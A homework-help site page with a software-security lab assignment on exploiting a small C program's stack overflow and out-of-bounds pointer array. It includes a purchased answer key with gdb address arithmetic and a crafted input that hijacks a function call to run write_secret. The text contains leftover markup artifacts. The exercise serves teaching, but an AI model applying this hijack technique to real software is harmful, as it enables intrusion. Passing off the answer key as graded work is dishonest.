question archive Complete this Question 1) There is a stack-based overflow in the program

Complete this Question 1) There is a stack-based overflow in the program

Subject:Computer SciencePrice:2.87 Bought7

Complete this

Question 1) There is a stack-based overflow in the program. What is the name of the stack-allocated variable that contains the overflowed buffer?

Preview

Question 2

Consider the buffer you just identified: Running what line of code will overflow the buffer? (We want the line number, not the code itself.)

Question 3

There is another vulnerability, not dependent at all on the first, involving a non-stack-allocated buffer that can be indexed outside its bounds (which, broadly construed, is a kind of buffer overflow). What variable contains this buffer?

 

Question 4

Consider the buffer you just identified: Running what line of code overflows the buffer? (We want the number here, not the code itself.)

 

Question 5

What is the address of color{red}{verb|buf|}

buf (the local variable in the color{red}{verb|main|}

main function)? Enter the answer in either hexadecimal format (a 0x followed by 8 "digits" 0-9 or a-f, like color{red}{verb|0xbfff0014|}

0xbfff0014) or decimal format. Note here that we want the address of color{red}{verb|buf|}

buf, not its contents.

 

Question 6

What is the address of color{red}{verb|ptrs|}

ptrs (the global variable) ? As with the previous question, use hex or decimal format.

 

Question 7

What is the address of color{red}{verb|write_secret|}

write_secret (the function) ? Use hex or decimal.

 

Question 8

What is the address of color{red}{verb|p|}

p (the local variable in the color{red}{verb|main|}

main function) ? Use hex, or decimal format.

 

Question 9

What input do you provide to the program so that color{red}{verb|ptrs[s]|}

ptrs[s] reads (and then tries to execute) the contents of stack variable color{red}{verb|p|}

p instead of a function pointer stored in the buffer pointed to by color{red}{verb|ptrs|}

ptrs? As a hint, you can determine the answer by performing a little arithmetic on the addresses you have already gathered. If successful, you will end up executing the color{red}{verb|pat_on_back|}

pat_on_back function. Provide the smallest positive integer.

 

Question 10

What do you enter so that color{red}{verb|ptrs[s]|}

ptrs[s] reads (and then tries to execute) starting from the 65th byte in color{red}{verb|buf|}

buf, i.e., the location at color{red}{verb|buf[64]|}

buf[64]? Enter your answer as an (unsigned) integer.

 

Question 11

What do you replace color{red}{verb|xEExEExEExEE|} with in the following input to the program (which due to the overflow will be filling in the 65th-68th bytes of color{red}{verb|buf|}) so that the color{red}{verb|ptrs[s]|} operation executes the color{red}{verb|write_secret|} function, thus dumping the secret? (Hint: Be sure to take endianness into account.)

color{red}{verb|771675175x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxEExEExEExEE|}

pur-new-sol

Purchase A New Answer

Custom new solution created by our subject matter experts

GET A QUOTE

Answer Preview

Answer:

1. wis

2. 62

3. ptrs

4. 101

5. 0xbfff f130

6. 0x0804 a0d4

7, 0x0804 8534

8. 0xbfff f534

9. 

(p-ptrs)/4 is

print /x (0xbffff534 - 0x804a0d4)/4

0x2dfed518 or 771675416

10. 

(gdb) print /x &buf[64]

$6 = 0xbffff170

(gdb) print /d (int*)&buf[64]-(int *)&ptrs

$14 = 771675175

771675175

11. 

(gdb) print &write_secret

$7 = (void (*)(void)) 0x8048534 <write_secret>

771675175\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x34\x85\x04\x08

 

Related Questions